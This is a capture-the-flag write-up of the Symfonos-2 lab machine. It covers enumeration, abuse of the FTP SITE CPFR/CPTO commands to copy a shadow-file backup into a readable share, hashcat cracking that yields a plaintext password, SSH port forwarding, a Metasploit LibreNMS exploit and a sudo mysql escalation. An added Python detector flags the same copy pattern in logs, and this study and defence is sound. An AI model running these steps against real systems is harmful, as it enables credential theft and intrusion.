Last updated: 15 Apr 24 09:34:11 (UTC)

Write-Up Symfonos-2

Symfonos-2

By Lawcky 20/01/24

Introduction

Symfonos-2

Difficulty: Medium

Additional info:

Name: symfonos: 2
Release date: 18 Jul 2019
Author: Zayotic
Series: symfonos

|NOTE| we won't copy all the scans here as they would be far too voluminous; click here to see them


In this write-up

  • nmap
  • enum4linux
  • smbclient
  • ftp
  • exploits (manual)
  • hashcat
  • metasploit
  • mysql setuid

Write-Up

FTP

trying an anonymous login

ftp anonymous@192.168.1.86


the server asks for an email address


Fuzzing port 80

found nothing


Enum4Linux SMB

enum4linux 192.168.1.86


found Unix users aeolus and cronus

found domain name SYMFONOS2

smbclient //192.168.1.86/anonymous -U anonymous


found the share anonymous, with a log file (log.txt) inside that reveals the location of a backup of the shadow file

seems like aeolus is the user behind the anonymous share; we would need his email address to access it


FTP RCE

the FTP server version is vulnerable to remote code execution (exploit link: here)

the exploit didn't work

yet we can still run SITE commands through FTP, and thanks to enum4linux we know the path of the SMB anonymous share

/home/aeolus/share

and in log.txt we found the path of the shadow file backup

/var/backups/shadow.bak

we can thus run

site cpfr /var/backups/shadow.bak
site cpto /home/aeolus/share/shadow.bak

on the FTP port, then access the Samba share again

smbclient //192.168.1.86/anonymous -U anonymous
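As an added, defender-side example that is not part of the original write-up: detection logic for the SITE CPFR/CPTO copy pattern used above, run over constructed ProFTPD-style log lines. It pairs each CPFR with the next CPTO from the same client and user, and flags pairs that read or write outside the FTP root or touch a sensitive file; the log format, the FTP root and the sample lines are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed ProFTPD-style command log lines (assumption: ExtendedLog "%t %a %u %r";
# adapt LINE_RE to the log format actually configured).
SAMPLE_LOG = """\
2024-01-20 10:01:12 192.168.1.50 anonymous "USER anonymous"
2024-01-20 10:01:20 192.168.1.50 anonymous "SITE CPFR /var/backups/shadow.bak"
2024-01-20 10:01:21 192.168.1.50 anonymous "SITE CPTO /home/aeolus/share/shadow.bak"
2024-01-20 10:05:02 192.168.1.77 bob "SITE CPFR /srv/ftp/pub/readme.txt"
2024-01-20 10:05:03 192.168.1.77 bob "SITE CPTO /srv/ftp/pub/readme-copy.txt"
2024-01-20 10:06:00 192.168.1.77 bob "SITE CPTO /srv/ftp/pub/orphan.txt"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<user>\S+) '
    r'"SITE (?P<cmd>CPFR|CPTO) (?P<path>[^"]+)"$',
    re.IGNORECASE,
)

# Copies of these files are always escalated, whatever the FTP root is.
SENSITIVE_SOURCES = ("/etc/shadow", "/var/backups/shadow", "/etc/passwd")

def detect_mod_copy_abuse(log_text: str, ftp_root: str = "/srv/ftp/") -> List[tuple]:
    """Pair each SITE CPFR with the next SITE CPTO from the same client and user,
    and return (ts, ip, user, src, dst, reasons) for pairs that read or write
    outside the FTP root or touch a sensitive file."""
    pending: Dict[Tuple[str, str], str] = {}   # (ip, user) -> CPFR path awaiting CPTO
    alerts: List[tuple] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["cmd"].upper() == "CPFR":
            pending[key] = m["path"]
            continue
        src = pending.pop(key, None)
        if src is None:
            continue                   # CPTO with no preceding CPFR: nothing to pair
        dst, reasons = m["path"], []
        if not src.startswith(ftp_root):
            reasons.append("source outside FTP root")
        if not dst.startswith(ftp_root):
            reasons.append("destination outside FTP root")
        if src.startswith(SENSITIVE_SOURCES):
            reasons.append("sensitive source file")
        if reasons:
            alerts.append((m["ts"], m["ip"], m["user"], src, dst, reasons))
    return alerts
```

The benign readme copy produces no alert, while the shadow.bak copy is reported with all three reasons.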



Hashcat

(screenshot: the hashcat attack mode)

hashcat -m 1800 shadow.bak ~/tools/seclists/rockyou.txt


aeolus:sergioteamo



Privilege Escalation

from aeolus to root

1

found among the setuid binaries:


/usr/sbin/exim4 -bV -v


found an exploit for this version on exploit-db

we take the setuid variant of this exploit and run it

it did not work


2

found among the running services:


could not find any database credentials for the MySQL service, so let's look at the other service running on 8080

ssh -L 10.8.0.6:1234:127.0.0.1:8080 aeolus@192.168.1.86


it's a LibreNMS service

the credentials aeolus:sergioteamo worked


could not find the version of the installation

searchsploit LibreNMS

let's try the remote code execution module with Metasploit



Privilege Escalation

from cronus to root

user cronus can run mysql via sudo with NOPASSWD

using GTFOBins:


got the flag